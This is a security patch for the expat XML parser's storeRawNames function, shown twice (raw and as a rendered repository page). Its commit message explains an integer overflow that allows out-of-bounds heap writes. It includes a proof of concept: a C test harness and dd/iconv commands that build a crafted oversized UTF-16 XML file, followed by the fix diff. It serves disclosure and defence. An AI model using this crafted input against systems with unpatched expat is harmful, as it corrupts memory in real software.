expat/SOURCES/expat-2.2.10-Prevent-intege...

From eb0362808b4f9f1e2345a0cf203b8cc196d776d9 Mon Sep 17 00:00:00 2001
From: Samanta Navarro <ferivoz@riseup.net>
Date: Tue, 15 Feb 2022 11:55:46 +0000
Subject: [PATCH] Prevent integer overflow in storeRawNames

It is possible to use an integer overflow in storeRawNames for out of
boundary heap writes. Default configuration is affected. If compiled
with XML_UNICODE then the attack does not work. Compiling with
-fsanitize=address confirms the following proof of concept.

The problem can be exploited by abusing the m_buffer expansion logic.
Even though the initial size of m_buffer is a power of two, eventually
it can end up a little bit lower, thus allowing allocations very close
to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag
names can be parsed which are almost INT_MAX in size.

Unfortunately (from an attacker point of view) INT_MAX/2 is also a
limitation in string pools. Having a tag name of INT_MAX/2 characters
or more is not possible.

Expat can convert between different encodings. UTF-16 documents which
contain only ASCII representable characters are twice as large as their
ASCII encoded counter-parts.

The proof of concept works by taking these three considerations into
account:

1. Move the m_buffer size slightly below a power of two by having a
   short root node <a>. This allows the m_buffer to grow very close
   to INT_MAX.
2. The string pooling forbids tag names longer than or equal to
   INT_MAX/2, so keep the attack tag name smaller than that.
3. To be able to still overflow INT_MAX even though the name is
   limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag
   which only contains ASCII characters. UTF-16 always stores two
   bytes per character while the tag name is converted to using only
   one. Our attack node byte count must be a bit higher than
   2/3 INT_MAX so the converted tag name is around INT_MAX/3 which
   in sum can overflow INT_MAX.

Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes
without running into INT_MAX boundary check. The string pooling is
able to store INT_MAX/3 as tag name because the amount is below
INT_MAX/2 limitation. And creating the sum of both eventually overflows
in storeRawNames.

Proof of Concept:

1. Compile expat with -fsanitize=address.

2. Create Proof of Concept binary which iterates through input
   file 16 MB at once for better performance and easier integer
   calculations:

```
cat > poc.c << EOF
 #include <err.h>
 #include <expat.h>
 #include <stdlib.h>
 #include <stdio.h>

 #define CHUNK (16 * 1024 * 1024)
 int main(int argc, char *argv[]) {
   XML_Parser parser;
   FILE *fp;
   char *buf;
   int i;

   if (argc != 2)
     errx(1, "usage: poc file.xml");
   if ((parser = XML_ParserCreate(NULL)) == NULL)
     errx(1, "failed to create expat parser");
   if ((fp = fopen(argv[1], "r")) == NULL) {
     XML_ParserFree(parser);
     err(1, "failed to open file");
   }
   if ((buf = malloc(CHUNK)) == NULL) {
     fclose(fp);
     XML_ParserFree(parser);
     err(1, "failed to allocate buffer");
   }
   i = 0;
   while (fread(buf, CHUNK, 1, fp) == 1) {
     printf("iteration %d: XML_Parse returns %d\n", ++i,
       XML_Parse(parser, buf, CHUNK, XML_FALSE));
   }
   free(buf);
   fclose(fp);
   XML_ParserFree(parser);
   return 0;
 }
EOF
gcc -fsanitize=address -lexpat -o poc poc.c
```

3. Construct specially prepared UTF-16 XML file:

```
dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml
echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml
echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368
iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml
```

4. Run proof of concept:

```
./poc poc-utf16.xml
```
---
 expat/lib/xmlparse.c | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/lib/xmlparse.c b/lib/xmlparse.c
index 4b43e613..f34d6ab5 100644
--- a/lib/xmlparse.c
+++ b/lib/xmlparse.c
@@ -2563,6 +2563,7 @@ storeRawNames(XML_Parser parser) {
   while (tag) {
     int bufSize;
     int nameLen = sizeof(XML_Char) * (tag->name.strLen + 1);
+    size_t rawNameLen;
     char *rawNameBuf = tag->buf + nameLen;
     /* Stop if already stored.  Since m_tagStack is a stack, we can stop
        at the first entry that has already been copied; everything
@@ -2574,7 +2575,11 @@ storeRawNames(XML_Parser parser) {
     /* For re-use purposes we need to ensure that the
        size of tag->buf is a multiple of sizeof(XML_Char).
     */
-    bufSize = nameLen + ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
+    rawNameLen = ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
+    /* Detect and prevent integer overflow. */
+    if (rawNameLen > (size_t)INT_MAX - nameLen)
+      return XML_FALSE;
+    bufSize = nameLen + (int)rawNameLen;
     if (bufSize > tag->bufEnd - tag->buf) {
       char *temp = (char *)REALLOC(parser, tag->buf, bufSize);
       if (temp == NULL)
initial package creation Signed-off-by: Toshaan Bharvani <toshaan@powerel.org> 2 years ago			`From eb0362808b4f9f1e2345a0cf203b8cc196d776d9 Mon Sep 17 00:00:00 2001`
			`From: Samanta Navarro <ferivoz@riseup.net>`
			`Date: Tue, 15 Feb 2022 11:55:46 +0000`
			`Subject: [PATCH] Prevent integer overflow in storeRawNames`

			`It is possible to use an integer overflow in storeRawNames for out of`
			`boundary heap writes. Default configuration is affected. If compiled`
			`with XML_UNICODE then the attack does not work. Compiling with`
			`-fsanitize=address confirms the following proof of concept.`

			`The problem can be exploited by abusing the m_buffer expansion logic.`
			`Even though the initial size of m_buffer is a power of two, eventually`
			`it can end up a little bit lower, thus allowing allocations very close`
			`to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag`
			`names can be parsed which are almost INT_MAX in size.`

			`Unfortunately (from an attacker point of view) INT_MAX/2 is also a`
			`limitation in string pools. Having a tag name of INT_MAX/2 characters`
			`or more is not possible.`

			`Expat can convert between different encodings. UTF-16 documents which`
			`contain only ASCII representable characters are twice as large as their`
			`ASCII encoded counter-parts.`

			`The proof of concept works by taking these three considerations into`
			`account:`

			`1. Move the m_buffer size slightly below a power of two by having a`
			`short root node <a>. This allows the m_buffer to grow very close`
			`to INT_MAX.`
			`2. The string pooling forbids tag names longer than or equal to`
			`INT_MAX/2, so keep the attack tag name smaller than that.`
			`3. To be able to still overflow INT_MAX even though the name is`
			`limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag`
			`which only contains ASCII characters. UTF-16 always stores two`
			`bytes per character while the tag name is converted to using only`
			`one. Our attack node byte count must be a bit higher than`
			`2/3 INT_MAX so the converted tag name is around INT_MAX/3 which`
			`in sum can overflow INT_MAX.`

			`Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes`
			`without running into INT_MAX boundary check. The string pooling is`
			`able to store INT_MAX/3 as tag name because the amount is below`
			`INT_MAX/2 limitation. And creating the sum of both eventually overflows`
			`in storeRawNames.`

			`Proof of Concept:`

			`1. Compile expat with -fsanitize=address.`

			`2. Create Proof of Concept binary which iterates through input`
			`file 16 MB at once for better performance and easier integer`
			`calculations:`

			```
			`cat > poc.c << EOF`
			`#include <err.h>`
			`#include <expat.h>`
			`#include <stdlib.h>`
			`#include <stdio.h>`

			`#define CHUNK (16 * 1024 * 1024)`
			`int main(int argc, char *argv[]) {`
			`XML_Parser parser;`
			`FILE *fp;`
			`char *buf;`
			`int i;`

			`if (argc != 2)`
			`errx(1, "usage: poc file.xml");`
			`if ((parser = XML_ParserCreate(NULL)) == NULL)`
			`errx(1, "failed to create expat parser");`
			`if ((fp = fopen(argv[1], "r")) == NULL) {`
			`XML_ParserFree(parser);`
			`err(1, "failed to open file");`
			`}`
			`if ((buf = malloc(CHUNK)) == NULL) {`
			`fclose(fp);`
			`XML_ParserFree(parser);`
			`err(1, "failed to allocate buffer");`
			`}`
			`i = 0;`
			`while (fread(buf, CHUNK, 1, fp) == 1) {`
			`printf("iteration %d: XML_Parse returns %d\n", ++i,`
			`XML_Parse(parser, buf, CHUNK, XML_FALSE));`
			`}`
			`free(buf);`
			`fclose(fp);`
			`XML_ParserFree(parser);`
			`return 0;`
			`}`
			`EOF`
			`gcc -fsanitize=address -lexpat -o poc poc.c`
			```

			`3. Construct specially prepared UTF-16 XML file:`

			```
			`dd if=/dev/zero bs=1024 count=794624 \| tr '\0' 'a' > poc-utf8.xml`
			`echo -n '<a><' \| dd conv=notrunc of=poc-utf8.xml`
			`echo -n '><' \| dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368`
			`iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml`
			```

			`4. Run proof of concept:`

			```
			`./poc poc-utf16.xml`
			```
			`---`
			`expat/lib/xmlparse.c \| 7 ++++++-`
			`1 file changed, 6 insertions(+), 1 deletion(-)`

			`diff --git a/lib/xmlparse.c b/lib/xmlparse.c`
			`index 4b43e613..f34d6ab5 100644`
			`--- a/lib/xmlparse.c`
			`+++ b/lib/xmlparse.c`
			`@@ -2563,6 +2563,7 @@ storeRawNames(XML_Parser parser) {`
			`while (tag) {`
			`int bufSize;`
			`int nameLen = sizeof(XML_Char) * (tag->name.strLen + 1);`
			`+ size_t rawNameLen;`
			`char *rawNameBuf = tag->buf + nameLen;`
			`/* Stop if already stored. Since m_tagStack is a stack, we can stop`
			`at the first entry that has already been copied; everything`
			`@@ -2574,7 +2575,11 @@ storeRawNames(XML_Parser parser) {`
			`/* For re-use purposes we need to ensure that the`
			`size of tag->buf is a multiple of sizeof(XML_Char).`
			`*/`
			`- bufSize = nameLen + ROUND_UP(tag->rawNameLength, sizeof(XML_Char));`
			`+ rawNameLen = ROUND_UP(tag->rawNameLength, sizeof(XML_Char));`
			`+ /* Detect and prevent integer overflow. */`
			`+ if (rawNameLen > (size_t)INT_MAX - nameLen)`
			`+ return XML_FALSE;`
			`+ bufSize = nameLen + (int)rawNameLen;`
			`if (bufSize > tag->bufEnd - tag->buf) {`
			`char temp = (char )REALLOC(parser, tag->buf, bufSize);`
			`if (temp == NULL)`